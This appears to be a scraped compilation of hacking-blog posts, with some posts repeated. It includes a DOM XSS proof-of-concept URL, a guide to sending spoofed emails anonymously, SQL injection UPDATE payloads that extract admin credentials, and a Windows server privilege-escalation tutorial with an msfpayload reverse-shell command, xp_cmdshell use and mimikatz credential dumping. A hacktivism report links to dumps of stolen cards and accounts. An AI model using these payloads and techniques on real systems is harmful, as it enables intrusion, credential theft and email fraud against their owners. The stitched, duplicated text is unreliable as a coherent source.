Kali Linux DOM Based XSS Writeup

Recently, I have been on a mission to find XSS in popular security training websites, Since these are the ones who care about their security the most. I have been successful in finding in almost all of them i have tried up to date, This one was a bit interesting to i thought to write a post on it, Basically it was not a reflected/stored xss, however it was a DOM based XSS, similar to the one i found in Microsoft. Unlike others, this particular XSS occurs in client side javascript.

In order to provide features to the users lots of webmasters/Vendors are moving their code towards client side, the data is embedded in the DOM and before it's reflected back to the user it is not filtered out, which results in a DOM based XSS. The main cause of this vulnerabilities are dangerous Sinks. DOM based XSS wiki is a good source where you would find dangerous sources and sinks.

On checking out the source of kali.org, i immediately found out that i was running wordpress version 3.5.1, The version is the latest version of the wordpress and has no known public vulnerabilities till date, therefore i moved towards testing plugins.

I tested couple of plugins, however did not find any one of them vulnerable, by analyzing the source more deeply i found a pretty interesting plugin "WP-Pretty Photo" which caught my interest. Which is a jquery based lightbox for wordpress platform.

While, searching for common vulnerabilities for wp-prettyphoto plugin i found that it was vulnerable to DOM Based XSS. So, i quickly added my payload to the url and bamn it triggered an XSS.

POC:

http://www.kali.org/#!%22%3E%3Cimg%20src=1%20onerror=prompt%280%29;%3E//

Some debugging with chrome JS console, led me to the line 79 of the jquery.prettyPhoto.js, the line of code which was responsible for the cause of the DOM Based XSS.

http://www.kali.org/wp-content/themes/persuasion/lib/scripts/prettyphoto/js/jquery.prettyPhoto.js?ver=2.1

It was also obvious from the code that it required us ! sign to successfully execute the javascript.

The input inside the hashrel was not filtered out before it was being displayed to the user, which resulted in the DOM Based XSS.

The Fix

The following url discusses, about the fix:

https://github.com/Duncaen/prettyphoto/commit/3ef0ddfefebbcc6bbe9245f9cea87e26838e9bbc

If, this was not enough for you, then listen to this, Offensive-security team was very awesome in a sense, that they gave me a free voucher for their famous certification PWB 3.0.

 

I was really surprised to see that Dominator was not detecting it which is the only good tool for finding DOM Based XSS leaving IBM javascript scan apart, in past i have tried dominator against various websites suffering from DOM Based XSS and have found that, at some spots it's very good and at some spots it needs much improvement. Here is the screenshot:

I would like that every one would be act the same way i did and responsibly disclose every issue you find.

In this post, I am going to show you how to use your Gmail account to send and receive emails from multiple addresses. Most of us own more than one email account say for example, one from Gmail, one from Yahoo and one from Hotmail. If you are tired of logging into multiple accounts to check your inbox or send emails, I have a solution here.

Gmail has an option to integrate multiple email accounts (email addresses) into a single Gmail account. Once you integrate multiple email addresses into your Gmail account, you can use the same account to send and receive emails for different email addresses you have. Let’s take a simple example.

Suppose you have three email addresses (email accounts):

1. john@gmail.com
2. john@yahoo.com
3. john@hotmail.com

You can integrate the emails john@yahoo.com and john@hotmail.com to john@gmail.com and operate all the three accounts from your single gmail account. Here is a step-by-step procedure to do this:

1. Login to your gmail account.
2. Click on Settings at the top right corner.
3. Under Settings, click on the  Accounts tab.
4. Now you’ll see the first option “Send mail as:“
5. Under this option, click on Add another email address you own.
6. Now a small new window will pop-up asking you to enter the details of your new email address.
7. Here you can enter any name and any email address. The email address need not belong to gmail only. You can enter your yahoo, hotmail or any other valid email address.
8. A Verification email will be sent to the address that you specify. Once you verify that you own the email address, it will be integrated to your Gmail account.

Now, when you compose a new email, you’ll see an option to select from multiple address to send the mail. Also you’ll receive the incoming mails for multiple addresses to a single mailbox. I hope this will benefit you.

Before you leave, I should also tell you one good advantage of this. According to Gmail privacy policy, they will not send the user’s IP address in the outgoing emails. That means, when you send an email from your Gmail account , the receiver will not be able to find out your IP address. But you do not have this advantage in Yahoo or other email providers.

Please share your opinions through comments. I hope this helps….

How Was 133day.com Hacked?

Today, in the morning when i browsed to 1337day.com (The famous exploit buying/selling database), I was shocked to see 1337day defaced by famous turkish hacker group named "Turkguvenligi", In past Turkguvenligi has been responsible for defacements of lots of famous websites. Here is what appeared when i came across 1337day.com

On their defacement page, they told that they had asked 1337day to ban a fake user with author id =5819 but they refused to do so, As i browsed to http://www.1337day.com/author/5819, i website was first appeared to be inaccessible, later it showed the following message:

However, i used their mirror site 1337day.org to access the author link, Here is the screenshot:

By looking at the author name "Agd_Scorp", i understood the whole point of the dispute, Agd_Scorp is a well known hacker and founding member of "Turkguvenligi", He is responsible for lots of high profile defacements, If you take a look at his Zone-h record, it's pretty impressive, he has history of hacking into domain registrars.

It appears to me that some known was submitting exploits with the name of Agd_Scorp, They asked 1337day team to remove it, however they refused to remove it. Therefore they defaced their website.

How was 1337day.com hacked?

There have been issues in the past where 1337day, injectors etc and their mirror websites were hacked, but in all of those cases, their servers were never compromised, it was their domain registrar Moniker.com, which got compromised by the attackers.

The attackers, compromised moniker.com and changed their dns servers to their own dns servers, a story matching Google Pakistan hack, The 1337day team later confirmed on their facebook that their domain registrar was the victim of their attack not their DNS servers.

They have also asked webmasters not to invent stories that their server was hacked. They say it's impossible, I don't agree with them on this point. Even most secure systems can be compromised.

On performing a WHOIS lookup, I came to know that they have actually switched their hosting account from Moniker.com to hostgator.com

I have confirmed with hostgator that the dns servers for websitewelcome belong to them. We, will update you as soon as we have more information.

How to Send Spoofed Emails Anonymously

Most of us are very curious to know a method to send spoofed emails to our friends and family for fun. But the question is, is it possible to send spoofed emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc?

The answer is YES, it is still possible to bypass their spam filters and send spoofed emails anonymously to your friends or family members. For example, you can send an email to your friend with the following sender details.

From: Bill Gates <billg@microsoft.com>

The art of sending this kind of email is known as Email Spoofing. One of the easy way to send a spoofed email is by using our own local SMTP server. In the past, I have tried SMTP servers like QK SMTP server. This method used to work successfully in those days, but as of now, it has a very low success rate since Gmail and Yahoo (all major email service providers) blocks the emails that are sent directly from a home computer.

How to Send Spoofed Emails?

In this post, I have come up with a new method of sending spoofed emails to anyone without having to worry about being blocked or filtered as spam. In order to accomplish this, all you’ve to do is use a “relay server” while sending the spoofed emails.

What is a Relay Server?

In simple words, a relay server is an SMTP Server that is trusted by major companies as an authorized sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorized, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.

So, How to Find a Relay Server?

Now, all we have to do is find a trusted SMTP server so as to send spoofed emails successfully. Usually, all the emails that are sent from web hosting providers are trusted and authorized. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free web hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However, all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the email header to insert a fake From: address field into it.

I have created a PHP script that allows you to send emails from any name and email address of your choice. Here is a step-by-step procedure to setup your own anonymous email sender script:

1. Go to X10 Hosting  and register a new account.
2. Download my script from the following link:
   Download Anonymous Email Sender Script
3. Login to your FreeWebHostingArea Account and click on File Manager.
4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.
5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.
6. Now type the following URL:
   http://yoursite.x10hosting.com/sendmail.php
   NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.
7. Use the script to send spoofed emails anonymously to your friends and have fun. Enjoy!!!

Tell me whether it worked or not. Please pass your comments.

Use One Gmail Account to Send Emails from Multiple IDs

In this post, I am going to show you how to use your Gmail account to send and receive emails from multiple addresses. Most of us own more than one email account say for example, one from Gmail, one from Yahoo and one from Hotmail. If you are tired of logging into multiple accounts to check your inbox or send emails, I have a solution here.

Gmail has an option to integrate multiple email accounts (email addresses) into a single Gmail account. Once you integrate multiple email addresses into your Gmail account, you can use the same account to send and receive emails for different email addresses you have. Let’s take a simple example.

Suppose you have three email addresses (email accounts):

1. john@gmail.com
2. john@yahoo.com
3. john@hotmail.com

You can integrate the emails john@yahoo.com and john@hotmail.com to john@gmail.com and operate all the three accounts from your single gmail account. Here is a step-by-step procedure to do this:

1. Login to your gmail account.
2. Click on Settings at the top right corner.
3. Under Settings, click on the  Accounts tab.
4. Now you’ll see the first option “Send mail as:“
5. Under this option, click on Add another email address you own.
6. Now a small new window will pop-up asking you to enter the details of your new email address.
7. Here you can enter any name and any email address. The email address need not belong to gmail only. You can enter your yahoo, hotmail or any other valid email address.
8. A Verification email will be sent to the address that you specify. Once you verify that you own the email address, it will be integrated to your Gmail account.

Now, when you compose a new email, you’ll see an option to select from multiple address to send the mail. Also you’ll receive the incoming mails for multiple addresses to a single mailbox. I hope this will benefit you.

Before you leave, I should also tell you one good advantage of this. According to Gmail privacy policy, they will not send the user’s IP address in the outgoing emails. That means, when you send an email from your Gmail account , the receiver will not be able to find out your IP address. But you do not have this advantage in Yahoo or other email providers.

Please share your opinions through comments. I hope this helps….

How to Block Unwanted Emails

Do you want to block unwanted emails from your ex wife/husband? Do you want to block those annoying offers and newsletters that reach your inbox? Well, here is a way to block all those unwanted and annoying emails that you do not want to see or read!

In this post, I will show you a trick using which you can block individual email address or the whole domain from which you do not want the emails to come from.

Steps to Block Unwanted Emails from Your Account:

Here is a list of separate set of steps that you need to follow for each individual service provider:

For Gmail:

Here is how you can block emails for Gmail:

1. Log in to your account.
2. At the top-right corner, click on Settings.
3. Under Settings, click on Filters.
4. You’ll now see an option “Create a new filter“, click on it.
5. Now in the From field, enter the email address from which you do not want to receive the emails.
   For ex. you may enter john@gmail .com in the “From:” field to block all incoming emails from this address. However, if you want to block the whole domain, then use the following syntax: *@xyz.com. Now, all the incoming emails from the domain “xyz.com” will be blocked.
6. Click on Next Step, select the action you’d like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. In case if you would like to unblock those emails, all you need to do is just delete the filter that you’ve created.

For Yahoo:

Here is how you can block unwanted emails for Yahoo:

1. Log in to your account.
2. At the top-right corner, click on Options.
3. A drop down menu appears, now click on More options.
4. In the left panel select the option Filters and click on create or edit filters.
5. Now click on Add.
6. In the next screen, give a name to your filter and in the From header field enter the email address that you want to block.

Fox ex. john@gmail.com or if you want to block an entire domain then just enter @xyz.com. Don’t enter *@xyz.com. Select the option Move the message to: Trash and click on Save Changes.

For Hotmail:

Here is how to do the same for Hotmail:

1. Log in to your account.
2. At the top-right corner, click on Options.
3. A drop down menu appears, now click on More options.
4. Click on Safe and blocked senders link under Junk e-mail.
5. Now click on Blocked senders.
6. Type in the email address that you want to block under blocked e-mail address or domain field.

For ex. Enter john@yahoo.com to block the individual email address or just enter xyz.com to block the entire domain.

That’s it. You no longer receive those annoying emails in your inbox. Keep your inbox clean and tidy. I hope this post helps. Pass your comments!

How to Bypass Right Click Block on Any Website

You might remember an experience where you tried to right-click on a web page but got a pop-up message saying that the “right-click functionality has been disabled”. Sometimes you may be trying to copy an image or view the source of a web page but when the right-click is disabled, these things would seem impossible. Bank websites and other sites that require a secure transaction such as a payment gateway are the ones to impose this kind of limited functionality on their pages. In this post, I will show you the ways by which you can easily bypass right-click block feature on any website.

In order to block the right-click activity, most websites make use of JavaScript which is one of the popular scripting languages used to enhance functionality, improve user experience and provide rich interactive features. In addition to this, it can also be used to strengthen the website’s security by adding some of the simple security features such as disabling right-click, protecting images, hiding or masking parts of a web page and so on.

How JavaScript Works?

Before you proceed to the next part which tells you how to disable the JavaScript functionality and bypass any of the restrictions imposed by it, it would be worthwhile for you to take up a minute to understand how JavaScript works.

JavaScript is a client side scripting language (in most cases), which means when loaded it runs from your own web browser. Most modern browsers including IE, Firefox, Chrome and others support JavaScript so that they can interpret the code and carry out actions that are defined in the script. In other words, it is your browser which is acting upon the instruction of JavaScript to carry out the defined actions such as blocking the right-click activity. So, disabling the JavaScript support on your browser can be a simple solution to bypass all the restrictions imposed by the website.

How to Disable the JavaScript?

Here is a step-by-step procedure to disable JavaScript on different browsers:

For Internet Explorer:

If you are using IE, just follow the steps below:

1. From the menu bar, go to Tools -> Internet Options.
2. In the “Internet Options” window, switch to Security tab and click on the button Custom level…

3. From the Security Settings, look for the option Active scripting and select the Disable radio button as shown above and click on “OK”.
4. You may even select the Prompt radio button, so that each time a page is loaded, you will have the option to either enable or disable the scripting.

For Google Chrome:

If you are using Chrome, you can disable the JavaScript by following the steps below:

1. Click on the Chrome “menu” button (on the top right corner) and select Tools.
2. From the “Settings” page, click on Show advanced settings…
3. Now under Privacy, click on the button Content settings…

4. Under the JavaScript, select the radio button which says “Do not allow any site to run JavaScript” and click on “Done”.

For Mozilla Firefox:

Steps to disable JavaScript on Firefox:

1. From the menu bar, click on Tools -> Options.
2. From the Options window, switch to Content tab, uncheck the option which says “Enable JavaScript” and click on “OK”.

How to Bypass the Right Click Block?

In order to bypass the right-click block or any other restriction imposed by JavaScript, all you need to do is just disable it in the browser and refresh the same page, so that it now reloads without JavaScript functionality. You are now free to right-click on the page, view its source or even copy any of the images that you may want to. Don’t forget to re-enable the JavaScript once again when your job is over. Otherwise lack of JavaScript support may result in unusual rendering of web pages.

Anonymous Hackers Cause Significant Damage To Banking And Government Agencies

A collective of hacker groups planed to attack the websites of major government agencies and banks on May 7 to protest American foreign policy.

For weeks, the groups, which include Anonymous, have used social media to publicize their planned operation, dubbed "#OpUSA."


Experts from USA(to cover up things) say that the attack was not well-planned and focused. On the other hand, twitter is full of #OpUSA tweets which tells us a different story. The hacker groups have compromised a large number of targets which as either owned by US government or its residents.

AnonGhost made a significant contribution to #OpUSA by taking down a large number of websites, emails, credit cards, etc. According to their pastebin post, hackers claim to hack-

- More than 700 websites (http://pastebin.com/zftTrrrh)
- More than 10k American credit cards(http://pastebin.com/D4QCynHC)
- 1 lac email accounts which belong to US residents (http://www45.zippyshare.com/v/58998013/file.html) 4. - More than 5000 facebook accounts(http://pastebin.com/NRvmnYFe)
- More than 12k email accounts of USA (http://www11.zippyshare.com/v/39103082/file.html)

The complete paste can be seen here(http://pastebin.com/RSqKCd1N).

The list of hacked sites mostly include high profile government websites from Australia, Ministry of environment Dominica, government of Argentina, Philippines, NGOs,  universities and other educational institutions from Thailand  Brazil, Russia, Israel, USA, Canada, UK, Romania, and Italy.

Most of the sites seem to be recovered but some of them are still now defaced, down or under maintenance.

We managed to ask the leader of AnonOps "Mauritania Attacker", also responsible for lots of high profile defacements, the purpose and the cause of the #OPUSA.

"I attack USA because they think that muslims are terrorist but the reality is that they themselves are the biggest terrorist and they declared war Against Islam and me as a Muslim i will stand against them even if i die " Mauritania Attacker said.

Mauritania Attacker is the leader of AnonOPS, He played a major role inside #OPISRAEL, along with it he is also responsible for other high profile attacks on lots of other organizations.

Note: RHA has no association with any of the hacktivists.

SQL Injection With Update Query

We have wrote couple of articles discussing various techniques and attack vectors for SQL Injection, We have already discussed Basic SQL Injection With Union Based, Blind SQL Injection, Time Based SQL Injection and also discussed common problems and their solutions related to SQL Injection. However, this time Daniel Max a regular reader of RHA will discuss about exploiting SQL Injection with Update Query.

Most of the tutorials, You see on the web usually explains to use the SELECT method in order to retrieve stuff from the database, But what if we wanted to update some thing that is already present in the database, For example a MD5 hash, that we are not able to crack, In order to gain access to the admin panel, We would simply run a update query and it will automatically update the password. We recommend you to atleast read little bit about MYSQL from w3schools.com, before proceeding with this tutorial as this tutorial is not for complete beginners.

Requirements

• Tamper Data
• Burp Suite
• Know how of MySQL (w3schools.com recommended)

So, Below is a screenshot of the form which we want to update, What we want to update is the Email address with our SQL Injection.


Vulnerable parameter is "E-mail format: " value.We would use Tamper data to intercept and change the values.

Here is a screenshot:



After we click ok we get an error the following error:

First we want to find the exact database version, but what would be the easiest way.

We can set value for other parameters, MySQL will let us do that as long as that parameter is one of UPDATE query parameters. We will use "fname" , which is string value. Database query output will be shown inside "First name" input box (where it says MaXoNe).

Screenshot of version query:

Screenshot of the rendered content with database answer:

Now that we know how to create our query, lets get the tables.

Full query: html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = '

Tables Query:


Screenshot of the rendered content with database answer:




Three tables, strange !? Lets check that again.We use count.

Full query: html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = '

Screenshot of get tables count query:



Screenshot of the rendered content with database answer:

Now is time for Burp intruder.Set browser to use 127.0.0.1 and 8080 for all URLs.
We use Burp Suite intruder with 'Attack type' "Sniper" and 'Payload type' "Numbers"

Full query: html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = '

Screenshot of burp settings:

Thats it. And now you just get columns the same way with Burp Suite.

Full query: html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = '

Just increment n with Burp Suite.

Values :

Full query: html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = '

Just increment n with Burp Suite.

That's it , simple and yet effective . I used this because , waf blocked -- and --+ so I wasn't able to close and comment out query.

Hacking Windows Servers - Privilege Escalation

Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.

But, these get the job done only on Linux servers. What about windows servers?

Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.

• Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure.
• Using meterpreter payload to get a reverse shell over the target machine.
• Using browser_autopwn. (Really...)
• Using other tools like pwdump7, mimikatz, etc.

Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.

1. Using xp_cmdshell-

Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.

If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website.

You must be wondering why only "sa"?

Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server.

The picture below shows the connection string containing login credentials of "sa" account.

Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.

So, after getting the "sa" account, we can login remotely using HeidiSQL

HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.

After logging into MSSQL server with sa account, we get a list of databases and their contents.

Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)

Syntax for the query is-

xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query-

xp_cmdshell 'whoami'

This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.

Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.

Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.

  

2. Meterpreter Payload-

This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.

Using metasploit, generate a reverse shell payload binary.

For example-

msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Now we will upload this executable to the server using our web backdoor.

Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)

Now it's time to execute the payload.

If everything goes right, we will get a meterpreter session over the target machine as shown below-

We can also use php, asp or other payloads.

3. Browser Autopwn-

This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.

Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.

I think it is clear by now that what I'm trying to explain ;)

We can start Internet Explorer from command line and make it browse to a specific URL.

Syntax for  this-

iexplore.exe [URL]

Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.

4. Using readily available tools-

Tools like pwdump and mimikatz can crack passwords of windows users.

#pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper.

The following screenshot shows NTLM hashes from pwdump7:

#mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it.

Following picture shows plain text passwords from mimikatz:

You can google about them and learn how to use these tools and what actually they exploit to get the job done for you.

I hope you can now exploit every another windows server.

Happy Hacking :)

SQL Injection With Update Query

We have wrote couple of articles discussing various techniques and attack vectors for SQL Injection, We have already discussed Basic SQL Injection With Union Based, Blind SQL Injection, Time Based SQL Injection and also discussed common problems and their solutions related to SQL Injection. However, this time Daniel Max a regular reader of RHA will discuss about exploiting SQL Injection with Update Query.

Most of the tutorials, You see on the web usually explains to use the SELECT method in order to retrieve stuff from the database, But what if we wanted to update some thing that is already present in the database, For example a MD5 hash, that we are not able to crack, In order to gain access to the admin panel, We would simply run a update query and it will automatically update the password. We recommend you to atleast read little bit about MYSQL from w3schools.com, before proceeding with this tutorial as this tutorial is not for complete beginners.

Requirements

• Tamper Data
• Burp Suite
• Know how of MySQL (w3schools.com recommended)

So, Below is a screenshot of the form which we want to update, What we want to update is the Email address with our SQL Injection.


Vulnerable parameter is "E-mail format: " value.We would use Tamper data to intercept and change the values.

Here is a screenshot:



After we click ok we get an error the following error:

First we want to find the exact database version, but what would be the easiest way.

We can set value for other parameters, MySQL will let us do that as long as that parameter is one of UPDATE query parameters. We will use "fname" , which is string value. Database query output will be shown inside "First name" input box (where it says MaXoNe).

Screenshot of version query:

Screenshot of the rendered content with database answer:

Now that we know how to create our query, lets get the tables.

Full query: html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = '

Tables Query:


Screenshot of the rendered content with database answer:




Three tables, strange !? Lets check that again.We use count.

Full query: html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = '

Screenshot of get tables count query:



Screenshot of the rendered content with database answer:

Now is time for Burp intruder.Set browser to use 127.0.0.1 and 8080 for all URLs.
We use Burp Suite intruder with 'Attack type' "Sniper" and 'Payload type' "Numbers"

Full query: html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = '

Screenshot of burp settings:

Thats it. And now you just get columns the same way with Burp Suite.

Full query: html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = '

Just increment n with Burp Suite.

Values :

Full query: html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = '

Just increment n with Burp Suite.

That's it , simple and yet effective . I used this because , waf blocked -- and --+ so I wasn't able to close and comment out query.